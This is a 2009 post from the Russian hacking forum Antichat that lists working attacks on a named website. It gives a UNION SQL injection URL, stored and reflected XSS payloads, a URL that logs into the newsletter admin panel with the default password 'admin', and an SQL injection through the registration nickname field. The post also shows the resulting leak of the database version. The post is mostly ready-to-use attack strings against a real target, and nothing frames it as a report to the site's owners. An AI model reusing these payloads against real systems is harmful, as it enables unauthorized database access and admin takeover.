14.04.2009, 22:45
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
SQL-INJ
http://profopros.info/index.php?do=news_more&id=-1+UNION+SELECT+1,2,3,version(),5,6+--+-
Активная XSS в гостевой
Код:
[img]javascript:alert()[/img]
Пассивная XSS
http://profopros.info/subscribe/addemail.php?email=<script>alert()</script>
Дефолтный пароль на админку подписки на рассылку
http://profopros.info/subscribe/admin.php?pswrd=admin
SQL-INJ в регистрации
Регаемся с ником логин','пароль',version(),'1231','111', '111','111','111')#
Ваш Логин: 222
Посл. ip :xxx
Счет : 1231 р. [+]
В профиле -
Почтовый ящик: 5.0.67-percona-highperf-b7-log
Примерно так же и в смене пароля в профиле.
Последний раз редактировалось BlackSun; 14.04.2009 в 23:48..
|
|
|